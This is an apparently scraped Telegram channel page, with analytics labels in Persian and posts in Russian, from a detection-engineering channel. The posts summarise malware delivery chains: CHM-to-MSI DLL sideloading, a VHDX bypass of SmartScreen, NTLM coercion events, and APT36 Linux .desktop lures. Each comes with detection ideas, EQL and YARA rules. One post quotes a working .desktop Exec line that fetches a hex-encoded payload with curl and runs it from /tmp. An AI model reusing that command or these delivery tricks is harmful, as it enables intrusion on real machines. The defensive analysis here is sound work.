fa
Feedback
Detection is easy

Detection is easy

رفتن به کانال در Telegram

chat: https://t.me/+BF4T6DOGv_UwYTBi contact: @siemmanager email: manager@detectioneasy.ru

نمایش بیشتر
روسيا294 151فناوری و برنامه‌ها39 201
1 232
مشترکین
اطلاعاتی وجود ندارد24 ساعت
+27 روز
+530 روز

در حال بارگیری داده...

کانال‌های مشابه
هیچ داده‌ای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
ابر برچسب‌ها
detection83
обнаружение81
реестр47
dll41
директория39
sysmon37
providername="microsoft36
endswith35
targetfilename27
скрипт23
загрузка22
eventid20
расширение18
строка18
хакер17
systemd16
write14
инцидент14
netsupport13
цепочка12
اشارات ورودی و خروجی
---
---
---
---
---
---
جذب مشترکین
ژوئن '26
ژوئن '26
+5
در 0 کانال‌ها
مه '26
+21
در 0 کانال‌ها
Get PRO
آوریل '26
+74
در 0 کانال‌ها
Get PRO
مارس '26
+62
در 0 کانال‌ها
Get PRO
فوریه '26
+25
در 0 کانال‌ها
Get PRO
ژانویه '26
+47
در 0 کانال‌ها
Get PRO
دسامبر '25
+47
در 1 کانال‌ها
Get PRO
نوامبر '25
+60
در 2 کانال‌ها
Get PRO
اکتبر '25
+58
در 1 کانال‌ها
Get PRO
سپتامبر '25
+50
در 1 کانال‌ها
Get PRO
اوت '25
+35
در 1 کانال‌ها
Get PRO
ژوئیه '25
+82
در 0 کانال‌ها
Get PRO
ژوئن '25
+62
در 2 کانال‌ها
Get PRO
مه '25
+160
در 1 کانال‌ها
Get PRO
آوریل '25
+108
در 3 کانال‌ها
Get PRO
مارس '25
+417
در 3 کانال‌ها
Get PRO
فوریه '250
در 0 کانال‌ها
Get PRO
ژانویه '25
+39
در 1 کانال‌ها
تاریخ
رشد مشترکین
اشارات
کانال‌ها
12 ژوئن0
11 ژوئن0
10 ژوئن0
09 ژوئن0
08 ژوئن+1
07 ژوئن+1
06 ژوئن+2
05 ژوئن0
04 ژوئن0
03 ژوئن0
02 ژوئن+1
01 ژوئن0
پست‌های کانال
Detection is easy
Всем привет 💻✌️ Коллеги из PT ESC разобрали кампанию CapFix, нацеленную на российские организации 👨‍💻 Как это работает? 🔤Основный вектор получения доступа фишинг с PDF/HTML-приманками, которые побуждают скачать файл ‍🔤В одной из цепочек внутри архива находился *.chm, который скачивал файл a.gif с скомпрометированного легитимного домена, переименовывал его в dmitry_medvedev.msi и открывал легитимный PDF-документ для отвлечения пользователя 🔤*.msi был подписан QILING Tech и создавал директорию C:\Users\admin\AppData\Local\Disk Master с множеством dll-файлов, и уязвимым к DLL sideloading MetadataConvert.exe 🔭 Обнаружение: 🔤 ищем переименованные файлы (с неисполняемого расширения в исполняемое) в $mft и $UsnJrnl:$J, кластеризируем по критичности 🔤 хантим бинарь с подписью QILING Tech 🔤 отслеживаем цепочку процессов (пример правила из eql - execution_via_compiled_html_file) 
process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : "hh.exe" and
 process.name : ("mshta.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "cscript.exe", "wscript.exe")
#detection@detectioneasy #ttp@detectioneasy

2
В Windows 11 версии 24H2 и Windows Server 2025 добавлены новая политика и события аудита NTLM. Расширенный аудит поддерживает
В Windows 11 версии 24H2 и Windows Server 2025 добавлены новая политика и события аудита NTLM. Расширенный аудит поддерживает улучшенный мониторинг безопасности и идентификацию устаревших зависимостей проверки подлинности NTLM. Ранее в новых ОС Windows при установке с нуля стали по умолчанию включать различные методы защиты от релей-атак, такие как EPA, SMB signing и LDAP-Channel Binding. Тем не менее, при апгрейде со старых версий ОС настройки будут оставаться прежние, и атаки будут работать. Поэтому обращаем внимание на новые события: — 4020 (Informational) — 4021 (Warning) "This machine attempted to authenticate to a remote resource via NTLM” — 4022 (Informational) — 4023 (Warning) “A remote client is using NTLM to authenticate to this workstation” Эти события можно использовать для детектирования coercing-атак либо для анализа  нетипичных  настроек NTLM-аутентификации. На скриншоте выше — как раз пример coercing-атаки: цепочка событий 4023 и 4021 с одного IP-адреса атакующего.
0
3
Всем привет 💻✌️ Автор статьи показал интересный способ доставки вредоносного ПО в обход предупреждений SmartScreen 👨‍💻 Как это работает? 🔤Цепочка довольно простая: zip -> vhdx -> trust.exe + malicious.dll 🔤 Пользователю доставляется архив, внутри которого находится образ диска VHDX 🔤 После открытия и монтирования образа, жертва видит легитимный ApplicationFrameHost.exe и вредоносную библиотеку UMPDC.dll Автор использует исполняемый файл с доверенной репутацией, чтобы обойти MotW 🔭 Обнаружение: 🔤 отслеживаем монтирование образов дисков VHD/VHDX/ISO/IMG 🔤 отслеживаем запуск исполняемых файлов с примонтированных образов и съемных носителей 🔤 отслеживаем загрузку неподписанных DLL рядом с системными файлами, расположенными в нетипичном пути 🔤 отслеживаем запуск системных файлов из пользовательских директорий, архивов, Temp и примонтированных образов #detection@detectioneasy #ttp@detectioneasy
0
4
Всем привет 💻✌️ Тема с ярлыками остаётся актуальной и для некоторых дистрибутивов Linux. Эту технику использует группировка APT36 .desktop — это launcher-файл, описанный в Desktop Entry Specification. Он используется desktop-environments для отображения приложений в меню и содержит параметр Exec, определяющий команду запуска. Пример файла: [Desktop Entry] Name=Meeting_Ltr_ID15430ps.pdf Exec=bash -c 'tmp_file="/tmp/Meeting_Ltr_ID15430ps.pdf-$(date +%s)"; curl -s "https://securestore.cv/ghg/Mt_dated_29.txt" | xxd -r -p > "$tmp_file" && chmod +x "$tmp_file" && "$tmp_file" & firefox --new-window "https://drive.google.com/file/d/123"' Terminal=false Type=Application Icon=application-pdf Categories=Utility; X-GNOME-Autostart-enabled=true X-AppImage-Integrate=false Злоумышленники используют файлы .desktop для получения доступа к хосту в фишинговых кампаниях. Далее цепочка действий несильно отличается от атак на Windows: загрузка вредоносного файла, его запуск и отображение пользователю decoy-файла 🔭 Обнаружение: 🔤 отслеживаем создание или модификацию .desktop файлов в пользовательских каталогах 🔤 хантим использование бинарей из gtfobins (bash, sh, python, curl, wget) в Exec rule Linux_Desktop_Suspicious_GTFOBins { meta: description = "Detect suspicious .desktop launcher executing shells or GTFOBins" author = "@detectioneasy" date = "2026-03-15" reference = "https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/" strings: $desktop = "[Desktop Entry]" ascii nocase $exec = "Exec=" ascii nocase $bash = "bash -c" ascii nocase $sh = "sh -c" ascii nocase $zsh = "zsh -c" ascii nocase $dash = "dash -c" ascii nocase $ash = "ash -c" ascii nocase $ksh = "ksh -c" ascii nocase $fish = "fish -c" ascii nocase $pipe_sh = "| sh" ascii nocase $pipe_bash = "| bash" ascii nocase $pipe_zsh = "| zsh" ascii nocase $pipe_dash = "| dash" ascii nocase $curl = "curl " ascii nocase $wget = "wget " ascii nocase $tmp = "/tmp/" ascii nocase $cache = ".cache/" ascii nocase condition: $desktop and $exec and 2 of ( $bash,$sh,$zsh,$dash,$ash,$ksh,$fish, $pipe_sh,$pipe_bash,$pipe_zsh,$pipe_dash, $curl,$wget,$tmp,$cache ) } #detection@detectioneasy #ttp@detectioneasy
0
مشاهده همه پست‌ها